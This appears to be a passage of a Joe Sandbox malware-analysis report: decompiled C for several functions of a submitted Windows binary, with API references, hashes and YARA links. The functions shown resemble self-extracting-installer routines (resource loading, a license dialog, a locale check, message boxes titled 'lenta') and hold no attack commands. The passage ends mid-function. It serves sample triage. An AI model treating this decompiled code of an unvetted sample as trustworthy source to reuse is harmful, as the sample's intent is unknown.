Opcode Fuzzy Hash: a722b7b2c1e0cb8d7fdbb8967766c81385f26c8d9f5d17e11527635300412725
Instruction Fuzzy Hash: A601D4352B8124ABD71A5F75DC0CDEE3B68EB4A710F00C410F946869B0CB749F41EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00942AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00942AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x948004; // 0xec518a5e
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x949a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00941680(_t65, E009417C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E009465E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00941680(_t65, E009417C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00946CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00942aac
0x00942ab7
0x00942abc
0x00942abe
0x00942ac3
0x00942ac6
0x00942ac9
0x00942ace
0x00942ae6
0x00942bdc
0x00942bdc
0x00942be0
0x00000000
0x00000000
0x00942af2
0x00942afc
0x00942b00
0x00942b05
0x00942b05
0x00942b0b
0x00942bca
0x00942bd1
0x00942b11
0x00942b18
0x00942b26
0x00942b99
0x00942bc8
0x00000000
0x00000000
0x00942b9b
0x00942bae
0x00942bb3
0x00942bb5
0x00942bb5
0x00942bb8
0x00942bb8
0x00942bba
0x00942bbb
0x00000000
0x00942bb8
0x00942b28
0x00942b2e
0x00942b33
0x00942b39
0x00942b3c
0x00942b3c
0x00942b3e
0x00942b3f
0x00942b55
0x00942b5d
0x00942b64
0x00942b64
0x00942b7a
0x00942b7f
0x00942b81
0x00942b81
0x00942b84
0x00942b84
0x00942b86
0x00942b87
0x00942bbf
0x00942bc1
0x00942bc1
0x00942b26
0x00942bda
0x00942bda
0x00942be6
0x00942be6
0x00942bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00942AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00942AF2
CharNextA.USER32(?), ref: 00942B12
CharUpperA.USER32 ref: 00942B1E
CharPrevA.USER32(?,?), ref: 00942B55
CharNextA.USER32(?), ref: 00942BD4

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 1ace1fb58a4e3ee864db490ad477ba04a55435b0949396de2a6d4848199c32fe
Instruction ID: eea9c2df894aab33958398aebb8a5566e07f683359d22cae5b05bdced7a3aa9c
Opcode Fuzzy Hash: 1ace1fb58a4e3ee864db490ad477ba04a55435b0949396de2a6d4848199c32fe
Instruction Fuzzy Hash: 5A4103385182855EDB159F349C54EFE7BADEF97300F54009AE8C287202DB358E86DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009443D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E009443D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x948004; // 0xec518a5e
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00946CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x009443d0
0x009443d8
0x009443df
0x009443e6
0x009443ec
0x009443f1
0x00944400
0x00944403
0x0094440b
0x00944420
0x00944429
0x00944437
0x00944444
0x00944447
0x0094444d
0x00944454
0x0094445b
0x00944460
0x00944461
0x00944467
0x0094446f
0x00944473
0x00944473
0x00944463
0x00944463
0x00944463
0x0094447a
0x00944481
0x00944484
0x0094448a
0x00944492
0x00944496
0x00944496
0x00944486
0x00944486
0x00944486
0x009444b8

APIs

GetWindowRect.USER32(?,?), ref: 009443F1
GetWindowRect.USER32(00000000,?), ref: 0094440B
GetDC.USER32(?), ref: 00944423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0094442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0094443A
ReleaseDC.USER32(?,00000000), ref: 00944447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009444A2

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: bc796336698a101cdd146ceee85120c3dcd031c1fd7895a795f63d70c9afb01d
Instruction ID: c46bb4747c659fc3e151b5b8bb745e97173bf3a79ca5397e3f71c9461e224b97
Opcode Fuzzy Hash: bc796336698a101cdd146ceee85120c3dcd031c1fd7895a795f63d70c9afb01d
Instruction Fuzzy Hash: B0315E36E14119AFCB14CFB8DD88EEEBBB5EB8A310F154569F805F3250DA346C059B60

Uniqueness

Uniqueness Score: -1.00%

Function 00946298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00946298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x948004; // 0xec518a5e
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0094171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x949124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x94a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0094171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00946CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00946298
0x009462a0
0x009462a7
0x009462ad
0x009462af
0x009462bb
0x009462c3
0x009462c4
0x0094633b
0x0094633b
0x00946345
0x0094634d
0x00000000
0x00000000
0x009462da
0x009462de
0x0094635f
0x00946369
0x009462e0
0x009462e0
0x009462e0
0x009462e3
0x009462e5
0x009462e5
0x009462e8
0x009462e8
0x009462ea
0x009462eb
0x009462ef
0x009462f1
0x009462f3
0x00946302
0x00946308
0x0094630d
0x00946314
0x00946314
0x00946316
0x00946319
0x00946355
0x00946357
0x0094631b
0x0094631b
0x00946331
0x00946334
0x00946339
0x00000000
0x00946339
0x00946319
0x0094636b
0x0094637d
0x0094637d
0x00000000

APIs

Part of subcall function 0094171E: _vsnprintf.MSVCRT ref: 00941750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 009462CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 009462D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 0094631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00946345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 00946357

Strings

UPDFILE%lu, xrefs: 009462B3, 00946329

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 1ad17ca81bc93f7e8b6c1787c1d2d6ef9f38867e351a4a5b43bef30323ec08e9
Instruction ID: ad5ec5cda6ca4a11c2d33607ad7edf76dde155f34eae66668d0c2876ae7ba1f3
Opcode Fuzzy Hash: 1ad17ca81bc93f7e8b6c1787c1d2d6ef9f38867e351a4a5b43bef30323ec08e9
Instruction Fuzzy Hash: 7221F3B5A04219ABDB149F64DC45DFFBB7CEB8A714B000119F902A3241DB759D029BE2

Uniqueness

Uniqueness Score: -1.00%

Function 0094681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0094681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x948004; // 0xec518a5e
				_v8 = _t19 ^ _t44;
				_t41 =  *0x9481d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x9481d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x9481d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x941140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E009466F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x9481d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00946CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0094681f
0x0094682a
0x00946831
0x00946836
0x0094683c
0x0094683e
0x00946848
0x00946851
0x0094685d
0x00946864
0x00946876
0x0094693a
0x0094693a
0x0094687c
0x0094687e
0x00946885
0x00000000
0x009468d6
0x009468f4
0x00946900
0x00946902
0x0094690a
0x00000000
0x0094690c
0x0094690c
0x0094691c
0x00000000
0x0094691e
0x00946924
0x0094692b
0x00946932
0x00000000
0x00000000
0x00000000
0x0094692b
0x0094691c
0x0094690a
0x00946885
0x00946876
0x00946951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0094686E
GetSystemMetrics.USER32(0000004A), ref: 009468A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009468CC
RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,?,0000000C), ref: 009468F4
RegCloseKey.ADVAPI32(?), ref: 00946902

Part of subcall function 009466F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0094691A), ref: 00946741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 009468C2

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 81ab26e1fff0e09a8abc84f340bf395faaca5c50382cffccae0bb25f1b208fc1
Instruction ID: a5e5875b48d10d39bb427f4ea5550f7a1af5662e379b4c969c8960a5ac9358a1
Opcode Fuzzy Hash: 81ab26e1fff0e09a8abc84f340bf395faaca5c50382cffccae0bb25f1b208fc1
Instruction Fuzzy Hash: 33318EB5A142189FDB318F11DC44FAAB7B8EB4B728F0001A9E949A2140DBB09E859F53

Uniqueness

Uniqueness Score: -1.00%

Function 00943A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00943A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0094468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x948d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0094468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x948d4c, "<None>") == 0) {
							LocalFree( *0x948d4c);
							L9:
							 *0x949124 = 0;
							return 1;
						}
						_t9 = E00946517(_t19, 0x7d1, 0, E00943100, 0, 0);
						LocalFree( *0x948d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x949124 = 0x800704c7;
						L2:
						return 0;
					}
					E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x948d4c);
					 *0x949124 = 0x80070714;
					goto L2;
				}
				E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x949124 = E00946285();
				goto L2;
			}

0x00943a46
0x00943a57
0x00943a5d
0x00943a63
0x00943a6a
0x00943a91
0x00943a9a
0x00943ad8
0x00943b13
0x00943b19
0x00943b1b
0x00000000
0x00943b21
0x00943ae7
0x00943af4
0x00943afc
0x00000000
0x00000000
0x00943afe
0x00943a87
0x00000000
0x00943a87
0x00943aa8
0x00943ab3
0x00943ab9
0x00000000
0x00943ab9
0x00943a78
0x00943a82
0x00000000

APIs

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00942F64,?,00000002,00000000), ref: 00943A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00943AB3

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00943AD0
LocalFree.KERNEL32 ref: 00943B13

Part of subcall function 00946517: FindResourceA.KERNEL32(00940000,000007D6,00000005), ref: 0094652A
Part of subcall function 00946517: LoadResource.KERNEL32(00940000,00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00946538
Part of subcall function 00946517: DialogBoxIndirectParamA.USER32(00940000,00000000,00000547,009419E0,00000000), ref: 00946557
Part of subcall function 00946517: FreeResource.KERNEL32(00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00946560

LocalFree.KERNEL32(00000000,00943100,00000000,00000000), ref: 00943AF4

Strings

LICENSE, xrefs: 00943A46
<None>, xrefs: 00943AC5

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 22d5e1b173fc09f352c58d6c4a56abba750bbbc620643870bc2f34bcb631457c
Instruction ID: b4c00d86d52308cd66d4f69765548daf51902b2be527689bc8c9d98f2047076b
Opcode Fuzzy Hash: 22d5e1b173fc09f352c58d6c4a56abba750bbbc620643870bc2f34bcb631457c
Instruction Fuzzy Hash: 4311EC787592016BD7345F329C09F1B3AFDDBDBB04B10862EF541E55E1DA798800A621

Uniqueness

Uniqueness Score: -1.00%

Function 009424E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E009424E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x948004; // 0xec518a5e
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0094658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00946CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x009424e0
0x009424eb
0x009424f2
0x009424f7
0x00942504
0x0094250e
0x0094251d
0x0094252c
0x00942541
0x00942546
0x00942553
0x00942555
0x00942555
0x00942546
0x0094256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00942506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0094252C
_lopen.KERNEL32 ref: 0094253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0094254C
_lclose.KERNEL32(00000000), ref: 00942555

Strings

wininit.ini, xrefs: 00942510

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 72e7b8ee66e101ca16d2e8c2412a9662dd518ce573d092d57cf4644ea4460238
Instruction ID: 1c8cf1d3924557de0a10f27121a5cabbd4e2b88f4e781b56c792b1b3c21c3e83
Opcode Fuzzy Hash: 72e7b8ee66e101ca16d2e8c2412a9662dd518ce573d092d57cf4644ea4460238
Instruction Fuzzy Hash: 2001B136614118ABD7209B65DC0CEDFBB7CEB87760F000155FA49D3190DE748E85CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 009436EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E009436EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x948004; // 0xec518a5e
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x948184 = 1;
						 *0x948180 = 1;
						L13:
						 *0x949a40 = _t119;
						L14:
						__eflags =  *0x948a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00942A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00942A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x948a38 & 0x00000001;
											if(( *0x948a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0094681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E009467C9(_t124, _t124);
